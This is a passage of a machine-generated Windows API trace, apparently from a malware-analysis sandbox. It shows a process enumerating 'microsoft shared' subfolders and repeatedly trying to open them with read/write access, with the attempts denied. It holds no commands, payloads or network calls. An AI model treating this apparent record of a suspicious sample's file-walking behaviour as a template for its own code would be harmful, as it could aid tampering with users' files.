Flags=0x0, Size=0x14) returned 0x5cb40 [0086.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0086.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0086.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0086.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0086.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0086.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0086.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0086.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0086.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0086.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0086.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0086.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0086.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0086.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0086.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0086.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0086.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0086.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0086.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c7a0 [0086.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0086.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0086.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ca40 [0086.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0086.936] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.936] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.936] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.936] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0086.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0086.936] AreFileApisANSI () returned 1 [0086.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform", lpUsedDefaultChar=0x0) returned 80 [0086.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0086.936] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.936] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0086.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0086.936] AreFileApisANSI () returned 1 [0086.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0086.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cd88 [0086.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x8cd88, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform") returned 80 [0086.936] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.936] GetLastError () returned 0x5 [0086.936] GetLastError () returned 0x5 [0086.936] SetLastError (dwErrCode=0x5) [0086.937] GetLastError () returned 0x5 [0086.937] SetLastError (dwErrCode=0x5) [0086.937] GetLastError () returned 0x5 [0086.937] SetLastError (dwErrCode=0x5) [0086.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0086.937] AreFileApisANSI () returned 1 [0086.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0086.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ce30 [0086.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x8ce30, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform") returned 80 [0086.937] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.937] GetLastError () returned 0x5 [0086.937] GetLastError () returned 0x5 [0086.937] SetLastError (dwErrCode=0x5) [0086.937] GetLastError () returned 0x5 [0086.937] SetLastError (dwErrCode=0x5) [0086.937] GetLastError () returned 0x5 [0086.937] SetLastError (dwErrCode=0x5) [0086.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ce30 | out: hHeap=0x20000) returned 1 [0086.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0086.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0086.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0086.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0086.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0086.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c7a0 [0086.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0086.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0086.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cae8 [0086.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0086.938] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4accd6e1, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4accd6e1, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4accd6e1, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Source Engine", cAlternateFileName="SOURCE~1")) returned 1 [0086.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0086.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0086.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0086.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0086.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0086.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0086.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0086.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c6f8 [0086.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c5a8 [0086.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xee) returned 0x80a30 [0086.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0086.938] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78690 [0086.939] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd99442a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd99442a7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd99442a7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.939] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd99442a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd99442a7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd99442a7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0086.939] FindClose (in: hFindFile=0x78690 | out: hFindFile=0x78690) returned 1 [0086.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0086.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ced8 [0086.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46198 [0086.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0086.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0086.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0086.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0086.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0086.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ced8 | out: hHeap=0x20000) returned 1 [0086.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c6f8 | out: hHeap=0x20000) returned 1 [0086.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0086.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46198 | out: hHeap=0x20000) returned 1 [0086.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0086.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0086.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0086.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0086.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0086.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0086.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0086.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0086.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ad80 [0086.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0086.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0086.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0086.940] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.940] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.940] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.940] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0086.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0086.940] AreFileApisANSI () returned 1 [0086.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine", lpUsedDefaultChar=0x0) returned 61 [0086.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0086.940] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.940] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0086.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0086.941] AreFileApisANSI () returned 1 [0086.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0086.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6e718 [0086.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e718, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine") returned 61 [0086.941] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.941] GetLastError () returned 0x5 [0086.941] GetLastError () returned 0x5 [0086.941] SetLastError (dwErrCode=0x5) [0086.941] GetLastError () returned 0x5 [0086.941] SetLastError (dwErrCode=0x5) [0086.941] GetLastError () returned 0x5 [0086.941] SetLastError (dwErrCode=0x5) [0086.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0086.941] AreFileApisANSI () returned 1 [0086.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0086.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6df20 [0086.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6df20, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine") returned 61 [0086.942] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.942] GetLastError () returned 0x5 [0086.942] GetLastError () returned 0x5 [0086.942] SetLastError (dwErrCode=0x5) [0086.942] GetLastError () returned 0x5 [0086.942] SetLastError (dwErrCode=0x5) [0086.942] GetLastError () returned 0x5 [0086.942] SetLastError (dwErrCode=0x5) [0086.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0086.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0086.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0086.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0086.942] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.942] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.942] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.942] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0086.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a530 [0086.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0086.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0086.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0086.942] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b5538f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a412e70, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0086.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0086.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0086.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0086.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0086.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0086.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0086.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0086.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0086.943] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x77fd0 [0086.943] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4accd6e1, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4accd6e1, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4accd6e1, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.943] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4accd6e1, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x3ba48, dwReserved0=0x0, dwReserved1=0x0, cFileName="OSE.EXE", cAlternateFileName="")) returned 1 [0086.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0086.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0086.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x464a8 [0086.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0086.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0086.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0086.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0086.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0086.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0086.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0086.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0086.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0086.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | 